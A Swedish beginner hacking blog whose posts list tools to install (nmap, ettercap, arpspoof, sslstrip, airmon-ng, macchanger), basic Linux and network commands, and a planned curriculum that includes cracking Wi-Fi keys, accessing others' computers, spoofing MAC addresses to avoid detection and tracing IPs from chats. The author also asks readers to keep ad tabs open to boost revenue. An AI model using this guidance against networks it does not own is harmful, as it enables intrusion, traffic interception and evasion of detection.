då¨kan du skriva nmap -sP -v -PN 172.20.0.157 för att kolla genom just den i nätverket.

Utforska och upptäck möjligheter i detta program. Det är dagens uppgift då vi kommer att använda det här till i stort sätt alla ALLA saker vi kommer gå igenom.

för att hjälpa mig genomföra och fortsätta den här bloggen så kan ni om ni vill (tvingar er verkligen inte, ni behöver inte göra det om ni inte känner för det) kanske bjuda in vänner till att kolla min blogg, trycka upp reklamen på min sida i några nya flikar och håll kvar det i minst 10-15 sekunder eller helst av allt "följa" min blogg( vilket det finns en knapp till i övre panelen)

Tack på förhand och jag kommer garantera att ni kommer kunna ett och annat när ni är klara ;) hehehe

MvH eran Hacker brutta/

Ninja

Happy mode!

Verkligen glad på responsen jag fått ifrån er!

Jag kommer skriva senare idag (runt kl 3-5 eller när jag får tid)
tills dess måste ni skaffa följande: Nmap, ettercap, arpspoof, sslstrip. för er som sitter på ubuntu, ni som har backtrack har redan det.

Ni som har ubuntu som ska skaffa ovanstående.
apt-get install nmap
apt-get install ettercap
sslstrip på http://www.thoughtcrime.org/software/sslstrip/
Lycka till!

nu börjar det.... ;)


MvH/
Ninja

Har ni lärt er något?

Jag vill gärna ha lite svar ifrån er då jag inte vet hur mycket ni har kommit hittills .

Jag vill att ALLA som har något intresse av den här bloggen ska svara på det här inlägget i kommentarena och skriva att ni kan det här och vad ni behöver hjälp med.

Kommer inte skriva något mer inlägg förens ni har visat mig att ni har kommit en bit.

Vill inte verka hård utan vill att ni ska ta det här på allvar.

MvH/
Ninja

Måndag.

Innan vi börjar gå igenom programmen så ska ni gå in på google och wikepedia och lära er vad följande saker är:
* Ip-adress (a,b och c klass adresser)
* Macadress
*Subnät
* Gateway
* Hur du kommer in i din router och kan ändra inställningar.

Det där MÅSTE ni kunna innan vi går vidare.

Ha en trevlig kväll :)

MvH /
Ninja :)

Söndag apr/3

För er som är klara med det som vi gått igenom ska nu försöka bli lite vana vid att använde erat operativsystem så ni inte kommer behöva fråga mig om allt :)

Lär er att hantera lite grundläggande saker och försök utforska lite mer i vad man kan använda det hela till.

Bättre att ni lär er lite själv än att jag ska sitta och gå igenom allt åt er ;)


Idag ska ni ALLA göra följande..
Först måste ni öppna terminalen. ( kommer visa er hur ni navigerar er runt )

Låt oss säga att ni är i mappen "home" (i terminalen, ser det ut så här: root:/home tex.) och vi vill se allt som finns i mappen? då skriver ni "ls" vilket visar allt som finns i mappen du är i.
Sen om du vill byta map du är i så skriver du tex:  cd desktop ( då hamnar du på skrivbordet)
Och skriver du nu ls så ser du allt du har på skrivbordet i terminalen.

Och om vi vill se vart vi är (alltså hela sökvägen) så skriver ni "pwd" så visar den det.

skulle vi vilja gå tillbaka ett steg från tillexepel "root:/home/desktop till root:/home/" (alltså backa ett steg bara) så skriver ni "cd .." vilket enkelt nog tar er tillbaka ett steg.


Lite grundläggande kanske men en del behöver den här informationen.

Frågor i kommentarerna som vanlig och jag kommer finnas här hela dagen.

MvH/
Ninja

Dubbel trubbel

Då jag ser att rätt många stött på problem med att bara installera backtrack och inte fått visa saker att fungera så är jag tvungen att hjälpa dom innan jag kan gå vidare vilken kan vara lite tråkigt för er som hoppades på en bra inlägg idag.

Så det första jag kommer göra är att hjälpa dom som behöver hjälp så dom inte kör fast.
jag la upp lite bilder nedanför det här inlägget då jag tror att några kommer behöva dom som hjälp.
skriv i kommentarerna det ni undrar över så ska jag tillägna den här dagen att hjälpa dom som behöver hjälp  och sen gå vidare.

Liten planering av vad vi kommer gå igenom den här veckan som kommer
Imorgon kommer jag försöka vara lite ledig eftersom jag har fullt upp i skolan och har mycket annat som tar upp mycket tid. kommer dock finnas till för dom som vill ha hjälp och behöver det. (något inlägg kommer nog upp)

Måndag: Kommer vi gå igenom lite mera grunder och förhoppningsvis komma igång lite.
Tisdag: Då hade jag tänk gå igenom ett scanning program och förklara lite om det och gå igenom hur du spårar ip adresser och kollar runt nätverket (både lokalt och på andra ställen)
Onsdag: kommer då gå igenom vad begreppet "phising" är och gå igenom program så som arpspoof, sslstrip och ettercap
Torsdag: Lite allmän säkerhet som tillexempel hur du skyddar dig trådlös och hur du knäcker nätverksnycklar och använder dig av verktygen/programmen ovan. Vi kommer då använda oss av ett program som heter Airmon-ng
Fredag: Summering av veckan.
Lördag ledig så då kommer jag finnas för support/hjälp
Söndag: Kommer jag gå igenom nästa veckas planering. ( då jag kommer gå igenom metasploit och trojarer mm.)


Men eftersom ni hoppades på någonting så kommer jag skriva ner några kommandon och vad dom gör för er som vill fortsätta och så kan dom som ligger efter läsa det här när dom är klara.
Så vad behöver du för att komma igång?
Dom kommandona som jag skrev är absolut nödvändiga och är i största hand "Basic" och behövs när du startar upp backtrack.
( dom kommandona som jag skriver kör du i terminalen)
Hur kollar jag enkelt via terminalen att en sida är uppe?
Du kan pinga den genom att skriva  Ping sen adressen eller ip:n (tex: ping www.google.se) och därefter får svar ifrån den.
Hur kollar jag min router/gateways ip i terminalen?
Route -n är kommandot för att kolla din gateway
Om jag vill kolla vilka vägar jag går när jag ska till google?
I windows skulle du skrivit "tracert sen adress" men i lbacktrack använder vi oss av ett kommando som heter "Traceroute" och fungerar nästan likadant som "tracert" .

Och för dom som är lite " bättre" och undrar varför jag skriver sånt som ovan är för att jag vill att en del ska få inblick i det vi kommer att hålla på med.


Frågor ställs i kommentarerna

Mvh/
Ninja :)

Såg att några hade problem med vad dom skulle göra så har lagt upp några feta bilder så ni ser vad man ska göra så ni får lite lätt uppfattning.

Ställ gärna frågor i kommentarerna 

När kommer guiden att starta?

Har fullt upp för tillfället så kommer inte hinna påbörja den här än.
Den kommer dock idag men bara lite senare.. typ runt kl 3

Vill gärna skriva så utförligt som möjligt när det gäller det här så det är därför jag skickar ut den kl 3 så jag verkligen hinner gå igenom det här.

För er som har haft lite problem.
/etc/init.d/networking start     är ett kommando för att väcka upp dina nätverksenheter.
Ifconfig  är ett kommando för att kolla dina nätverksenheter och kan se om dom är uppe eller inte.
Vi tar för exempel att vi vill väcka det trådlösa kortet "wlan0" , då skriver vi "ifconfig wlan0 up" och om vi skulle vilja ha ner det igen så skriver vi "ifconfig wlan0 down".
Så nu inför mitt kommande inlägg så hoppas jag att ni får era os och hårdvara att fungera! skriv i kommentarerna om det är något jag kan hjälpa till med.

Frågor från kommentarerna:
Kan jag göra det här genom att använda skiva?
ja det kan du och det fungerar lika bra :) ( glöm in att byta boot ordning så du börjar från skivan när du startar datorn, det brukar vara så att du måste trycka någon knapp under uppstart, tex: "press any buttom to boot from cd" så missa inte det )
Mitt nätverskort fungerar inte trots att jag skrivit dina kommandon?
Kolla för säkerhetens skull att ditt nätverskort stöds och om du har rätt drivrutiner, och det kan inte vara så att ditt kort redan är vaknat men  att den har ett annat namn bara?
Hur lång tid kommer den här guiden att hålla på?
Jag kommer till en start att hålla på under 3 veckors tid och sedan gå över till något mer avancerat.

Fick också en kommentar om att jag gör det här för reklamens skull vilket inte är sant då jag tar det här på fullt allvar och kommer satsa på att hålla igång den här sidan så lång tid jag kan.

Och för er som finner min blogg intressant hoppas jag kan njuta av följande inlägg i eftermidda.

MvH/
Ninja :)

Inför guiden som startar imorgon!

Jag vill att samtliga som kommer följa den här bloggen ska kunna ha tillgång till Backtrack 4 r2
http://www.backtrack-linux.org/
Det är en linux distribution som riktar sig mot säkerthet i första hand.
Det finns flera nödvändiga program där så du slipper hämta dom eller krångla med något.
Om du är på en annan linux distribution så som Ubuntu eller liknande går det lika bra också.

Ett bra tips för dig som ska installera backtrack! (andra kan skippa det!)
Du kan använda dig av ett usb för att installera det.
*Först behöver du minst ett 2 gig minne
*sen formaterar du den som FAT32 (högerklicka på enheten och tryck på formatera) * notera att det tar bort all information på stickan.
* Hämta och installera programment http://unetbootin.sourceforge.net/ som du kommer använde dig av.
* Hämta nyaste utgåvan av backtrack som du hittar på deras hemsida (http://www.backtrack-linux.org)
* öppna programment unetbootin och välj Backtrack.iso filen för att sedan påbörja installationen
När du sedan startar om datorn så ska du ha usb minnet in pluggat i datorn och boota ifrån den.
( du kan ändra vilken enhet datorn ska boota ifrån i bios, du går in i bios genom att klicka på bios knappen när du startar upp datorn, för mig är det tillexempel f1)

För er som sitter på ubuntu!
Ni kommer behöva följande program till en början.
* airmon-ng ( apt-get install airmon-ng)
* ettercap ( apt-get install ettercap, kan också vara apt-get install ettercap.gtk om jag minns rätt)
* Arpspoof
* Ssltrip (http://www.thoughtcrime.org/software/sslstrip/ )
* macchanger (apt-get install macchanger)
* Nmap (apt-get install nmap)
Bara till en början så återkommer med flera imorgon.

Om du är på Backtrack så behöver du diverse information för att börja.
När du startar upp den första gången efter du installerat själva operativsystemet så kommer ditt användarnamn vara "root" och lösenordet "toor" sen efter det ska du skriva "Startx" för att starta det.
För att starta nätverket så går du in i terminalen och skriver /etc/init.d/networking start för att starta din nätverksenheter.
Sen är det bra om du skriver /etc/init.d/wicd start vilket startar din nätverkshanterare (som kan nås vid menyn)
Nu kan du surfa och ha kontakt med nätet.

Det här är mest bara en förberedning till vad jag kommer börja med och jag kommer öka tempot vart eftersom.

Frågor? skriv i kommentarerna.
Är det något du behöver hjälp med? eller är det något du inte förstår riktigt? kom med förslag så kan jag ta upp dom i nästa inlägg.
Jag har fått en del förslag om videobloggar om det här och jag kommer göra det så småningom, om ni har något förslag på vad jag ska lära er/dig så skriv i kommentarerna :)

MvH/
Ninja

Vad kommer jag gå igenom?

Och för er som undrar vad jag kommer gå igenom och tänker visa er så lägger jag till detta inlägg.

Jag kommer till en början att gå igenom grunder för dom som är nybörjare och kommer senare rikta mig mot lite mera avancerade saker.
Jag kommer förklara hur du hackar ett trådlöst nätverk och får åtkomst till datorerna inom nätverket.
Jag kommer visa er hur man skyddar sig mot saker som ovan.
jag kommer visa er hur man byter macadress så man inte blir upptäck när man rotar runt.
Hur man spårar IP-adresser och hur du kan få fram en ip ifrån en msn konversation eller kanske bara ett mail?


Kommer gå igenom program så som Nmap, Metasploit, Ettercap, Airmon-ng, Cain, SSltrip, Arpspoof och massa massa mer.

Kommer visa och gå igenom Negativa och Positiva saker med programen ovanstående och diverse andra.
Har du själv något du skulle vilja lära dig så skriv en kommentar nedan så kommer jag nog gå igenom det förr eller senare :)

MvH/
Ninja